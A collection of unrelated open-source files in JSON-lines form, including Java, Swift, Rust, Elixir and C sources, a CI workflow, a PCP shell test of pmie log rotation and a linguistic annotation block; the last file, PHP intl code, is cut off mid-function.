beginning */\n if ((err = mp_mul_2d(&u, k, c)) != MP_OKAY) {\n goto LBL_V;\n }\n c->sign = MP_ZPOS;\n err = MP_OKAY;\nLBL_V:\n mp_clear(&u);\nLBL_U:\n mp_clear(&v);\n return err;\n}\n#endif\n"} {"text": "/**\r\n * Copyright (c) 2001-2020 Mathew A. Nelson and Robocode contributors\r\n * All rights reserved. This program and the accompanying materials\r\n * are made available under the terms of the Eclipse Public License v1.0\r\n * which accompanies this distribution, and is available at\r\n * https://robocode.sourceforge.io/license/epl-v10.html\r\n */\r\n// ------------------------------------------------------------------------------\r\n// \r\n// This code was generated by jni4net. See http://jni4net.sourceforge.net/ \r\n// \r\n// Changes to this file may cause incorrect behavior and will be lost if \r\n// the code is regenerated.\r\n// \r\n// ------------------------------------------------------------------------------\r\n\r\npackage robocode.control.events;\r\n\r\n@net.sf.jni4net.attributes.ClrTypeInfo\r\npublic final class BattleFinishedEvent_ {\r\n \r\n //\r\n private static system.Type staticType;\r\n \r\n public static system.Type typeof() {\r\n return robocode.control.events.BattleFinishedEvent_.staticType;\r\n }\r\n \r\n private static void InitJNI(net.sf.jni4net.inj.INJEnv env, system.Type staticType) {\r\n robocode.control.events.BattleFinishedEvent_.staticType = staticType;\r\n }\r\n //\r\n}\r\n"} {"text": "/*\n * Copyright 2017 The Bazel Authors. All rights reserved.\n *\n * Licensed under the Apache License, Version 2.0 (the \"License\");\n * you may not use this file except in compliance with the License.\n * You may obtain a copy of the License at\n *\n * http://www.apache.org/licenses/LICENSE-2.0\n *\n * Unless required by applicable law or agreed to in writing, software\n * distributed under the License is distributed on an \"AS IS\" BASIS,\n * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n * See the License for the specific language governing permissions and\n * limitations under the License.\n */\npackage com.google.idea.blaze.aspect.java.filteredgenjar;\n\nimport static com.google.common.truth.Truth.assertThat;\n\nimport com.google.devtools.intellij.IntellijAspectTestFixtureOuterClass.IntellijAspectTestFixture;\nimport com.google.devtools.intellij.ideinfo.IntellijIdeInfo.TargetIdeInfo;\nimport com.google.idea.blaze.BazelIntellijAspectTest;\nimport org.junit.Test;\nimport org.junit.runner.RunWith;\nimport org.junit.runners.JUnit4;\n\n/** Tests the filtered gen-jar functionality */\n@RunWith(JUnit4.class)\npublic class FilteredGenJarTest extends BazelIntellijAspectTest {\n\n @Test\n public void testFilteredGenJarNotCreatedForSourceOnlyRule() throws Exception {\n IntellijAspectTestFixture testFixture = loadTestFixture(\":source_only_fixture\");\n TargetIdeInfo targetIdeInfo = findTarget(testFixture, \":source_only\");\n assertThat(targetIdeInfo.getJavaIdeInfo().hasFilteredGenJar()).isFalse();\n }\n\n @Test\n public void testFilteredGenJarNotCreatedForOnlyGenRule() throws Exception {\n IntellijAspectTestFixture testFixture = loadTestFixture(\":gen_only_fixture\");\n TargetIdeInfo targetIdeInfo = findTarget(testFixture, \":gen_only\");\n assertThat(targetIdeInfo.getJavaIdeInfo().hasFilteredGenJar()).isFalse();\n }\n\n @Test\n public void testFilteredGenJar() throws Exception {\n IntellijAspectTestFixture testFixture = loadTestFixture(\":mixed_fixture\");\n TargetIdeInfo targetIdeInfo = findTarget(testFixture, \":mixed\");\n assertThat(targetIdeInfo.getJavaIdeInfo().hasFilteredGenJar()).isTrue();\n assertThat(targetIdeInfo.getJavaIdeInfo().getFilteredGenJar().getJar().getRelativePath())\n .isEqualTo(testRelative(\"mixed-filtered-gen.jar\"));\n assertThat(targetIdeInfo.getJavaIdeInfo().getFilteredGenJar().getSourceJar().getRelativePath())\n .isEqualTo(testRelative(\"mixed-filtered-gen-src.jar\"));\n }\n}\n"} {"text": "//\n// Filter.swift\n// Kingfisher\n//\n// Created by Wei Wang on 2016/08/31.\n//\n// Copyright (c) 2018 Wei Wang \n//\n// Permission is hereby granted, free of charge, to any person obtaining a copy\n// of this software and associated documentation files (the \"Software\"), to deal\n// in the Software without restriction, including without limitation the rights\n// to use, copy, modify, merge, publish, distribute, sublicense, and/or sell\n// copies of the Software, and to permit persons to whom the Software is\n// furnished to do so, subject to the following conditions:\n//\n// The above copyright notice and this permission notice shall be included in\n// all copies or substantial portions of the Software.\n//\n// THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\n// IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\n// FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE\n// AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\n// LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\n// OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN\n// THE SOFTWARE.\n\n\n\nimport CoreImage\nimport Accelerate\n\n// Reuse the same CI Context for all CI drawing.\nprivate let ciContext = CIContext(options: nil)\n\n/// Transformer method which will be used in to provide a `Filter`.\npublic typealias Transformer = (CIImage) -> CIImage?\n\n/// Supply a filter to create an `ImageProcessor`.\npublic protocol CIImageProcessor: ImageProcessor {\n var filter: Filter { get }\n}\n\nextension CIImageProcessor {\n public func process(item: ImageProcessItem, options: KingfisherOptionsInfo) -> Image? {\n switch item {\n case .image(let image):\n return image.kf.apply(filter)\n case .data(_):\n return (DefaultImageProcessor.default >> self).process(item: item, options: options)\n }\n }\n}\n\n/// Wrapper for a `Transformer` of CIImage filters.\npublic struct Filter {\n \n let transform: Transformer\n\n public init(tranform: @escaping Transformer) {\n self.transform = tranform\n }\n \n /// Tint filter which will apply a tint color to images.\n public static var tint: (Color) -> Filter = {\n color in\n Filter { input in\n let colorFilter = CIFilter(name: \"CIConstantColorGenerator\")!\n colorFilter.setValue(CIColor(color: color), forKey: kCIInputColorKey)\n \n let colorImage = colorFilter.outputImage\n let filter = CIFilter(name: \"CISourceOverCompositing\")!\n filter.setValue(colorImage, forKey: kCIInputImageKey)\n filter.setValue(input, forKey: kCIInputBackgroundImageKey)\n #if swift(>=4.0)\n return filter.outputImage?.cropped(to: input.extent)\n #else\n return filter.outputImage?.cropping(to: input.extent)\n #endif\n }\n }\n \n public typealias ColorElement = (CGFloat, CGFloat, CGFloat, CGFloat)\n \n /// Color control filter which will apply color control change to images.\n public static var colorControl: (ColorElement) -> Filter = { arg -> Filter in\n let (brightness, contrast, saturation, inputEV) = arg\n return Filter { input in\n let paramsColor = [kCIInputBrightnessKey: brightness,\n kCIInputContrastKey: contrast,\n kCIInputSaturationKey: saturation]\n \n let paramsExposure = [kCIInputEVKey: inputEV]\n #if swift(>=4.0)\n let blackAndWhite = input.applyingFilter(\"CIColorControls\", parameters: paramsColor)\n return blackAndWhite.applyingFilter(\"CIExposureAdjust\", parameters: paramsExposure)\n #else\n let blackAndWhite = input.applyingFilter(\"CIColorControls\", withInputParameters: paramsColor)\n return blackAndWhite.applyingFilter(\"CIExposureAdjust\", withInputParameters: paramsExposure)\n #endif\n }\n \n }\n}\n\nextension Kingfisher where Base: Image {\n /// Apply a `Filter` containing `CIImage` transformer to `self`.\n ///\n /// - parameter filter: The filter used to transform `self`.\n ///\n /// - returns: A transformed image by input `Filter`.\n ///\n /// - Note: Only CG-based images are supported. If any error happens during transforming, `self` will be returned.\n public func apply(_ filter: Filter) -> Image {\n \n guard let cgImage = cgImage else {\n assertionFailure(\"[Kingfisher] Tint image only works for CG-based image.\")\n return base\n }\n \n let inputImage = CIImage(cgImage: cgImage)\n guard let outputImage = filter.transform(inputImage) else {\n return base\n }\n \n guard let result = ciContext.createCGImage(outputImage, from: outputImage.extent) else {\n assertionFailure(\"[Kingfisher] Can not make an tint image within context.\")\n return base\n }\n \n #if os(macOS)\n return fixedForRetinaPixel(cgImage: result, to: size)\n #else\n return Image(cgImage: result, scale: base.scale, orientation: base.imageOrientation)\n #endif\n }\n\n}\n"} {"text": "//\n// ChartTableViewCell.swift\n// PNChartSwift\n//\n// Created by YiChen Zhou on 8/14/17.\n//\n\nimport UIKit\n\nclass ChartTableViewCell: UITableViewCell {\n @IBOutlet weak var cellLabel: UILabel!\n override func awakeFromNib() {\n super.awakeFromNib()\n // Initialization code\n }\n\n override func setSelected(_ selected: Bool, animated: Bool) {\n super.setSelected(selected, animated: animated)\n\n // Configure the view for the selected state\n }\n\n}\n"} {"text": "name: test all\non:\n push:\n branches:\n - master\n pull_request:\n branches:\n - master\nenv:\n PRISMA_TELEMETRY_INFORMATION: \"prisma-client-go test.yml\"\n\njobs:\n test:\n runs-on: ubuntu-latest\n\n steps:\n - uses: actions/checkout@v1\n\n - uses: actions/setup-go@v2\n with:\n go-version: '1.14'\n\n - uses: actions/cache@v2\n with:\n path: |\n ~/go/pkg/mod\n ~/.cache\n restore-keys: ${{ runner.os }}-go-\n key: ${{ runner.os }}-go-${{ hashFiles('**/go.sum') }}\n\n - name: deps\n run: go mod download\n\n - name: generate\n run: go generate ./...\n env:\n DEBUG: \"*\"\n PHOTON_GO_LOG: true\n\n - name: setup\n run: go run ./test/setup/init setup\n env:\n PHOTON_GO_LOG: true\n\n - name: test\n run: go test ./... -v\n env:\n PHOTON_GO_LOG: true\n"} {"text": "/*\n * Copyright (c) 2007, 2011, Oracle and/or its affiliates. All rights reserved.\n * DO NOT ALTER OR REMOVE COPYRIGHT NOTICES OR THIS FILE HEADER.\n *\n * This code is free software; you can redistribute it and/or modify it\n * under the terms of the GNU General Public License version 2 only, as\n * published by the Free Software Foundation. Oracle designates this\n * particular file as subject to the \"Classpath\" exception as provided\n * by Oracle in the LICENSE file that accompanied this code.\n *\n * This code is distributed in the hope that it will be useful, but WITHOUT\n * ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or\n * FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License\n * version 2 for more details (a copy is included in the LICENSE file that\n * accompanied this code).\n *\n * You should have received a copy of the GNU General Public License version\n * 2 along with this work; if not, write to the Free Software Foundation,\n * Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n *\n * Please contact Oracle, 500 Oracle Parkway, Redwood Shores, CA 94065 USA\n * or visit www.oracle.com if you need additional information or have any\n * questions.\n */\n\npackage java.nio.file;\n\nimport java.io.IOException;\n\n/**\n * An object that may be registered with a watch service so that it can be\n * watched for changes and events.\n *\n *

This interface defines the {@link #register register} method to register\n * the object with a {@link WatchService} returning a {@link WatchKey} to\n * represent the registration. An object may be registered with more than one\n * watch service. Registration with a watch service is cancelled by invoking the\n * key's {@link WatchKey#cancel cancel} method.\n *\n * @since 1.7\n *\n * @see Path#register\n */\n\npublic interface Watchable {\n\n /**\n * Registers an object with a watch service.\n *\n *

If the file system object identified by this object is currently\n * registered with the watch service then the watch key, representing that\n * registration, is returned after changing the event set or modifiers to\n * those specified by the {@code events} and {@code modifiers} parameters.\n * Changing the event set does not cause pending events for the object to be\n * discarded. Objects are automatically registered for the {@link\n * StandardWatchEventKinds#OVERFLOW OVERFLOW} event. This event is not\n * required to be present in the array of events.\n *\n *

Otherwise the file system object has not yet been registered with the\n * given watch service, so it is registered and the resulting new key is\n * returned.\n *\n *

Implementations of this interface should specify the events they\n * support.\n *\n * @param watcher\n * the watch service to which this object is to be registered\n * @param events\n * the events for which this object should be registered\n * @param modifiers\n * the modifiers, if any, that modify how the object is registered\n *\n * @return a key representing the registration of this object with the\n * given watch service\n *\n * @throws UnsupportedOperationException\n * if unsupported events or modifiers are specified\n * @throws IllegalArgumentException\n * if an invalid of combination of events are modifiers are specified\n * @throws ClosedWatchServiceException\n * if the watch service is closed\n * @throws IOException\n * if an I/O error occurs\n * @throws SecurityException\n * if a security manager is installed and it denies an unspecified\n * permission required to monitor this object. Implementations of\n * this interface should specify the permission checks.\n */\n WatchKey register(WatchService watcher,\n WatchEvent.Kind[] events,\n WatchEvent.Modifier... modifiers)\n throws IOException;\n\n\n /**\n * Registers an object with a watch service.\n *\n *

An invocation of this method behaves in exactly the same way as the\n * invocation\n *

\n     *     watchable.{@link #register(WatchService,WatchEvent.Kind[],WatchEvent.Modifier[]) register}(watcher, events, new WatchEvent.Modifier[0]);\n     * 
\n *\n * @param watcher\n * the watch service to which this object is to be registered\n * @param events\n * the events for which this object should be registered\n *\n * @return a key representing the registration of this object with the\n * given watch service\n *\n * @throws UnsupportedOperationException\n * if unsupported events are specified\n * @throws IllegalArgumentException\n * if an invalid of combination of events are specified\n * @throws ClosedWatchServiceException\n * if the watch service is closed\n * @throws IOException\n * if an I/O error occurs\n * @throws SecurityException\n * if a security manager is installed and it denies an unspecified\n * permission required to monitor this object. Implementations of\n * this interface should specify the permission checks.\n */\n WatchKey register(WatchService watcher, WatchEvent.Kind... events)\n throws IOException;\n}\n"} {"text": ""} {"text": "#! /bin/sh\n# PCP QA Test No. 314\n# Exercise pmie_daily functionality - log rotation\n#\n# Copyright (c) 2007 Aconex. All Rights Reserved.\n#\n\nseq=`basename $0`\necho \"QA output created by $seq\"\n\n# get standard filters\n. ./common.product\n. ./common.filter\n. ./common.check\n\n_cleanup()\n{\n cd $here\n if $was_running\n then\n\t_restore_auto_restart pmie\n\t_service pmie start >>$here/$seq.full 2>&1\n else\n\t_service pmie stop >>$here/$seq.full 2>&1\n\t$sudo $PCP_BINADM_DIR/pmsignal -a -s TERM pmie >>$here/$seq.full 2>&1\n\t_wait_pmie_end\n fi\n $sudo rm -fr $tmp.*\n $sudo rm -fr /tmp/$seq;\n}\n\n# wait for a file to appear ...\n#\n_wait_for()\n{\n _i=0\n while [ ! -f \"$1\" ]\n do\n\t_i=`expr $_i + 1`\n\tif [ \"$_i\" -ge 100 ]\n\tthen\n\t echo \"_wait_for: failed to see file $1 after 100 iterations\"\n\t return\n\tfi\n\tpmsleep 0.1\n done\n}\n\nsignal=$PCP_BINADM_DIR/pmsignal\nstatus=1\t# failure is the default!\ntrap \"_cleanup;\nexit \\$status\" 0 1 2 3 15\n\nwas_running=false\n[ -f $PCP_RUN_DIR/pmie.pid ] && was_running=true\n\nif $was_running\nthen\n _stop_auto_restart pmie\nfi\n\n# create a pmie config file, causing frequent output (to log)\ncat > $tmp.config << EOF1\ndelta = 0.2 seconds;\nfetched = simple.numfetch;\nEOF1\n\necho \"=== pmie config ===\" >$seq.full\ncat $tmp.config >>$seq.full\n\n# create pmie control files and test out various good/bad conditions\n\ncat > $tmp.control << EOF2\n\\$version=1.0\nLOCALHOSTNAME n /tmp/$seq/1.good.log -v -c $tmp.config\nEOF2\n\necho \"=== pmie control ===\" >>$seq.full\ncat $tmp.control >>$seq.full\n\n# real QA test starts here\n_service pmie stop >>$seq.full\n_wait_pmie_end\n$sudo $signal -a -s TERM pmie 2>/dev/null\n$sudo rm -fr /tmp/$seq && mkdir /tmp/$seq || exit 1\n$sudo chown -R $PCP_USER:$PCP_GROUP /tmp/$seq\npmstore simple.numfetch 0 >/dev/null\n\n# fire em all up\necho \"Starting pmie process\"\necho \"=== pmie_check ===\" >>$seq.full\ntouch $tmp.log\n$sudo chown $PCP_USER:$PCP_GROUP $tmp.log\n$sudo -u $PCP_USER -g $PCP_GROUP $PCP_BINADM_DIR/pmie_check -c $tmp.control -VV -l $tmp.log\n$sudo cat $tmp.log >>$seq.full\n_wait_for /tmp/$seq/1.good.log\nps $PCP_PS_ALL_FLAGS | grep '[p]mie' >>$seq.full\nsleep 6\t\t# fill original log a bit\ncat /tmp/$seq/1.good.log >>$seq.full\nps $PCP_PS_ALL_FLAGS | grep '[p]mie' >>$seq.full\n\necho \"Rotate, rotate...\"\nprevious=`pmdate -1d %Y%m%d`\necho \"=== pmie_daily ===\" >>$seq.full\n$sudo -u $PCP_USER -g $PCP_GROUP $PCP_BINADM_DIR/pmie_daily -c $tmp.control -VV -l $tmp.log\n$sudo cat $tmp.log >>$seq.full\n_wait_for /tmp/$seq/1.good.log\nps $PCP_PS_ALL_FLAGS | grep '[p]mie' >>$seq.full\nsleep 3\t\t# fill rotated log a bit\n\necho \"Shutdown pmie process\"\necho \"=== pmie_check ===\" >>$seq.full\n$sudo -u $PCP_USER -g $PCP_GROUP $PCP_BINADM_DIR/pmie_check -c $tmp.control -s -VV -l $tmp.log\n$sudo cat $tmp.log >>$seq.full\nps $PCP_PS_ALL_FLAGS | grep '[p]mie' >>$seq.full\n\ngrep rotated /tmp/$seq/1.good.log >/dev/null \\\n\t|| echo \"First log not rotated?\"\ngrep rotated /tmp/$seq/1.good.log.$previous >/dev/null \\\n\t|| echo \"New log not started?\"\n\n# look for data in each log file, checking rotation actually did something\noldlines=`wc -l < /tmp/$seq/1.good.log.$previous 2>/dev/null || echo 0`\nnewlines=`wc -l < /tmp/$seq/1.good.log 2>/dev/null || echo 0`\n# 5 samples / sec x ~6 sec x 2 lines per sample + 6 lines for header and footer\n# so 66\n_within_tolerance \"Old logfile line count\" \"$oldlines\" 66 %75 -v\n# 5 samples / sec x ~3 sec x 2 lines per sample + 6 lines for header and footer\n# so 36\n_within_tolerance \"New logfile line count\" \"$newlines\" 36 %75 -v\n\necho \"=== previous log ($oldlines lines) ===\" >>$seq.full\ncat /tmp/$seq/1.good.log.$previous >>$seq.full\necho \"=== current log ($newlines lines) ===\" >>$seq.full\ncat /tmp/$seq/1.good.log >>$seq.full\n\n# success, all done\nstatus=0\nexit\n"} {"text": "// Licensed under the Apache License, Version 2.0 or the MIT license\n// , at your\n// option. This file may not be copied, modified, or distributed\n// except according to those terms.\n\nuse buffer::{BufferResult, RefReadBuffer, RefWriteBuffer};\nuse cryptoutil::symm_enc_or_dec;\n\npub trait BlockEncryptor {\n fn block_size(&self) -> usize;\n fn encrypt_block(&self, input: &[u8], output: &mut [u8]);\n}\n\npub trait BlockEncryptorX8 {\n fn block_size(&self) -> usize;\n fn encrypt_block_x8(&self, input: &[u8], output: &mut [u8]);\n}\n\npub trait BlockDecryptor {\n fn block_size(&self) -> usize;\n fn decrypt_block(&self, input: &[u8], output: &mut [u8]);\n}\n\npub trait BlockDecryptorX8 {\n fn block_size(&self) -> usize;\n fn decrypt_block_x8(&self, input: &[u8], output: &mut [u8]);\n}\n\n#[derive(Debug, Clone, Copy)]\npub enum SymmetricCipherError {\n InvalidLength,\n InvalidPadding\n}\n\npub trait Encryptor {\n fn encrypt(&mut self, input: &mut RefReadBuffer, output: &mut RefWriteBuffer, eof: bool)\n -> Result;\n}\n\npub trait Decryptor {\n fn decrypt(&mut self, input: &mut RefReadBuffer, output: &mut RefWriteBuffer, eof: bool)\n -> Result;\n}\n\npub trait SynchronousStreamCipher {\n fn process(&mut self, input: &[u8], output: &mut [u8]);\n}\n\n// TODO - Its a bit unclear to me why this is necessary\nimpl SynchronousStreamCipher for Box {\n fn process(&mut self, input: &[u8], output: &mut [u8]) {\n let me = &mut **self;\n me.process(input, output);\n }\n}\n\nimpl Encryptor for Box {\n fn encrypt(&mut self, input: &mut RefReadBuffer, output: &mut RefWriteBuffer, _: bool)\n -> Result {\n symm_enc_or_dec(self, input, output)\n }\n}\n\nimpl Decryptor for Box {\n fn decrypt(&mut self, input: &mut RefReadBuffer, output: &mut RefWriteBuffer, _: bool)\n -> Result {\n symm_enc_or_dec(self, input, output)\n }\n}\n"} {"text": "# Copyright 2019 Google LLC\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\n# NOTE: This file is auto generated by the elixir code generator program.\n# Do not edit this file manually.\n\ndefmodule GoogleApi.Monitoring.V3.Model.WindowsBasedSli do\n @moduledoc \"\"\"\n A WindowsBasedSli defines good_service as the count of time windows for which the provided service was of good quality. Criteria for determining if service was good are embedded in the window_criterion.\n\n ## Attributes\n\n * `goodBadMetricFilter` (*type:* `String.t`, *default:* `nil`) - A monitoring filter (https://cloud.google.com/monitoring/api/v3/filters) specifying a TimeSeries with ValueType = BOOL. The window is good if any true values appear in the window.\n * `goodTotalRatioThreshold` (*type:* `GoogleApi.Monitoring.V3.Model.PerformanceThreshold.t`, *default:* `nil`) - A window is good if its performance is high enough.\n * `metricMeanInRange` (*type:* `GoogleApi.Monitoring.V3.Model.MetricRange.t`, *default:* `nil`) - A window is good if the metric's value is in a good range, averaged across returned streams.\n * `metricSumInRange` (*type:* `GoogleApi.Monitoring.V3.Model.MetricRange.t`, *default:* `nil`) - A window is good if the metric's value is in a good range, summed across returned streams.\n * `windowPeriod` (*type:* `String.t`, *default:* `nil`) - Duration over which window quality is evaluated. Must be an integer fraction of a day and at least 60s.\n \"\"\"\n\n use GoogleApi.Gax.ModelBase\n\n @type t :: %__MODULE__{\n :goodBadMetricFilter => String.t(),\n :goodTotalRatioThreshold => GoogleApi.Monitoring.V3.Model.PerformanceThreshold.t(),\n :metricMeanInRange => GoogleApi.Monitoring.V3.Model.MetricRange.t(),\n :metricSumInRange => GoogleApi.Monitoring.V3.Model.MetricRange.t(),\n :windowPeriod => String.t()\n }\n\n field(:goodBadMetricFilter)\n field(:goodTotalRatioThreshold, as: GoogleApi.Monitoring.V3.Model.PerformanceThreshold)\n field(:metricMeanInRange, as: GoogleApi.Monitoring.V3.Model.MetricRange)\n field(:metricSumInRange, as: GoogleApi.Monitoring.V3.Model.MetricRange)\n field(:windowPeriod)\nend\n\ndefimpl Poison.Decoder, for: GoogleApi.Monitoring.V3.Model.WindowsBasedSli do\n def decode(value, options) do\n GoogleApi.Monitoring.V3.Model.WindowsBasedSli.decode(value, options)\n end\nend\n\ndefimpl Poison.Encoder, for: GoogleApi.Monitoring.V3.Model.WindowsBasedSli do\n def encode(value, options) do\n GoogleApi.Gax.ModelBase.encode(value, options)\n end\nend\n"} {"text": "#begin document (wb/sel/70/sel_7041); part 000\nwb/sel/70/sel_7041 -1 0 [WORD] XX (TOP* - - - - * -\nwb/sel/70/sel_7041 -1 1 [WORD] XX * - - - - * -\nwb/sel/70/sel_7041 -1 2 [WORD] XX * - - - - * -\nwb/sel/70/sel_7041 -1 3 [WORD] XX * - - - - * -\nwb/sel/70/sel_7041 -1 4 [WORD] XX * - - - - * -\nwb/sel/70/sel_7041 -1 5 [WORD] VERB * mingle - 1 - * -\nwb/sel/70/sel_7041 -1 6 [WORD] XX * - - - - * -\nwb/sel/70/sel_7041 -1 7 [WORD] XX * - - - - * -\nwb/sel/70/sel_7041 -1 8 [WORD] XX * - - - - * -\nwb/sel/70/sel_7041 -1 9 [WORD] XX * - - - - * -\nwb/sel/70/sel_7041 -1 10 [WORD] XX * - - - - * -\nwb/sel/70/sel_7041 -1 11 [WORD] XX * - - - - * -\nwb/sel/70/sel_7041 -1 12 [WORD] XX * - - - - * -\nwb/sel/70/sel_7041 -1 13 [WORD] XX * - - - - * -\nwb/sel/70/sel_7041 -1 14 [WORD] XX * - - - - * -\nwb/sel/70/sel_7041 -1 15 [WORD] XX * - - - - * -\nwb/sel/70/sel_7041 -1 16 [WORD] XX * - - - - * -\nwb/sel/70/sel_7041 -1 17 [WORD] XX * - - - - * -\nwb/sel/70/sel_7041 -1 18 [WORD] XX * - - - - * -\nwb/sel/70/sel_7041 -1 19 [WORD] XX * - - - - * -\nwb/sel/70/sel_7041 -1 20 [WORD] XX * - - - - * -\nwb/sel/70/sel_7041 -1 21 [WORD] XX * - - - - * -\nwb/sel/70/sel_7041 -1 22 [WORD] XX * - - - - * -\nwb/sel/70/sel_7041 -1 23 [WORD] XX * - - - - * -\nwb/sel/70/sel_7041 -1 24 [WORD] XX *) - - - - * -\n\n#end document\n"} {"text": "/*\n +----------------------------------------------------------------------+\n | This source file is subject to version 3.01 of the PHP license, |\n | that is bundled with this package in the file LICENSE, and is |\n | available through the world-wide-web at the following url: |\n | http://www.php.net/license/3_01.txt |\n | If you did not receive a copy of the PHP license and are unable to |\n | obtain it through the world-wide-web, please send a note to |\n | license@php.net so we can mail you a copy immediately. |\n +----------------------------------------------------------------------+\n | Authors: Hans-Peter Oeri (University of St.Gallen) |\n +----------------------------------------------------------------------+\n */\n\n#include \n#include \n#include \n\n#include \n#include \n#include \n#include \n\n#include \"php_intl.h\"\n#include \"intl_data.h\"\n#include \"intl_common.h\"\n\n#include \"resourcebundle/resourcebundle.h\"\n#include \"resourcebundle/resourcebundle_iterator.h\"\n#include \"resourcebundle/resourcebundle_class.h\"\n#include \"resourcebundle/resourcebundle_arginfo.h\"\n\nzend_class_entry *ResourceBundle_ce_ptr = NULL;\n\nstatic zend_object_handlers ResourceBundle_object_handlers;\n\n/* {{{ ResourceBundle_object_free */\nstatic void ResourceBundle_object_free( zend_object *object )\n{\n\tResourceBundle_object *rb = php_intl_resourcebundle_fetch_object(object);\n\n\t// only free local errors\n\tintl_error_reset( INTL_DATA_ERROR_P(rb) );\n\n\tif (rb->me) {\n\t\tures_close( rb->me );\n\t}\n\tif (rb->child) {\n\t\tures_close( rb->child );\n\t}\n\n\tzend_object_std_dtor( &rb->zend );\n}\n/* }}} */\n\n/* {{{ ResourceBundle_object_create */\nstatic zend_object *ResourceBundle_object_create( zend_class_entry *ce )\n{\n\tResourceBundle_object *rb;\n\n\trb = zend_object_alloc(sizeof(ResourceBundle_object), ce);\n\n\tzend_object_std_init( &rb->zend, ce );\n\tobject_properties_init( &rb->zend, ce);\n\n\tintl_error_init( INTL_DATA_ERROR_P(rb) );\n\trb->me = NULL;\n\trb->child = NULL;\n\n\trb->zend.handlers = &ResourceBundle_object_handlers;\n\n\treturn &rb->zend;\n}\n/* }}} */\n\n/* {{{ ResourceBundle_ctor */\nstatic int resourcebundle_ctor(INTERNAL_FUNCTION_PARAMETERS)\n{\n\tconst char *bundlename;\n\tsize_t\t\tbundlename_len = 0;\n\tconst char *locale;\n\tsize_t\t\tlocale_len = 0;\n\tzend_bool\tfallback = 1;\n\n\tzval *object = return_value;\n\tResourceBundle_object *rb = Z_INTL_RESOURCEBUNDLE_P( object );\n\n\tintl_error_reset( NULL );\n\n\tif( zend_parse_parameters( ZEND_NUM_ARGS(), \"s!s!|b\",\n\t\t&locale, &locale_len, &bundlename, &bundlename_len, &fallback ) == FAILURE )\n\t{\n\t\treturn FAILURE;\n\t}\n\n\tif (rb->me) {\n\t\tzend_throw_error(NULL, \"ResourceBundle object is already constructed\");\n\t\treturn FAILURE;\n\t}\n\n\tINTL_CHECK_LOCALE_LEN_OR_FAILURE(locale_len);\n\n\tif (locale == NULL) {\n\t\tlocale = intl_locale_get_default();\n\t}\n\n\tif (bundlename_len >= MAXPATHLEN) {\n\t\tzend_argument_value_error(2, \"is too long\");\n\t\treturn FAILURE;\n\t}\n\n\tif (fallback) {\n\t\trb->me = ures_open(bundlename, locale, &INTL_DATA_ERROR_CODE(rb));\n\t} else {\n\t\trb->me = ures_openDirect(bundlename, locale, &INTL_DATA_ERROR_CODE(rb));\n\t}\n\n\tINTL_CTOR_CHECK_STATUS(rb, \"resourcebundle_ctor: Cannot load libICU resource bundle\");\n\n\tif (!fallback && (INTL_DATA_ERROR_CODE(rb) == U_USING_FALLBACK_WARNING ||\n\t\t\tINTL_DATA_ERROR_CODE(rb) == U_USING_DEFAULT_WARNING)) {\n\t\tchar *pbuf;\n\t\tintl_errors_set_code(NULL, INTL_DATA_ERROR_CODE(rb));\n\t\tspprintf(&pbuf, 0, \"resourcebundle_ctor: Cannot load libICU resource \"\n\t\t\t\t\"'%s' without fallback from %s to %s\",\n\t\t\t\tbundlename ? bundlename : \"(default data)\", locale,\n\t\t\t\tures_getLocaleByType(\n\t\t\t\t\trb->me, ULOC_ACTUAL_LOCALE, &INTL_DATA_ERROR_CODE(rb)));\n\t\tintl_errors_set_custom_msg(INTL_DATA_ERROR_P(rb), pbuf, 1);\n\t\tefree(pbuf);\n\t\treturn FAILURE;\n\t}\n\n\treturn SUCCESS;\n}\n/* }}} */\n\n/* {{{ ResourceBundle object constructor */\nPHP_METHOD( ResourceBundle, __construct )\n{\n\tzend_error_handling error_handling;\n\n\tzend_replace_error_handling(EH_THROW, IntlException_ce_ptr, &error_handling);\n\treturn_value = ZEND_THIS;\n\tif (resourcebundle_ctor(INTERNAL_FUNCTION_PARAM_PASSTHRU) == FAILURE) {\n\t\tif (!EG(exception)) {\n\t\t\tzend_throw_exception(IntlException_ce_ptr, \"Constructor failed\", 0);\n\t\t}\n\t}\n\tzend_restore_error_handling(&error_handling);\n}\n/* }}} */\n\n/* {{{ */\nPHP_FUNCTION( resourcebundle_create )\n{\n\tobject_init_ex( return_value, ResourceBundle_ce_ptr );\n\tif (resourcebundle_ctor(INTERNAL_FUNCTION_PARAM_PASSTHRU) == FAILURE) {\n\t\tzval_ptr_dtor(return_value);\n\t\tRETURN_NULL();\n\t}\n}\n/* }}} */\n\n/* {{{ resourcebundle_array_fetch */\nstatic void resourcebundle_array_fetch(zend_object *object, zval *offset, zval *return_value, int fallback)\n{\n\tint32_t meindex = 0;\n\tchar * mekey = NULL;\n zend_bool is_numeric = 0;\n\tchar *pbuf;\n\tResourceBundle_object *rb;\n\n\tintl_error_reset( NULL );\n\trb = php_intl_resourcebundle_fetch_object(object);\n\n\tif(Z_TYPE_P(offset) == IS_LONG) {\n\t\tis_numeric = 1;\n\t\tmeindex = (int32_t)Z_LVAL_P(offset);\n\t\trb->child = ures_getByIndex( rb->me, meindex, rb->child, &INTL_DATA_ERROR_CODE(rb) );\n\t} else if(Z_TYPE_P(offset) == IS_STRING) {\n\t\tmekey = Z_STRVAL_P(offset);\n\t\trb->child = ures_getByKey(rb->me, mekey, rb->child, &INTL_DATA_ERROR_CODE(rb) );\n\t} else 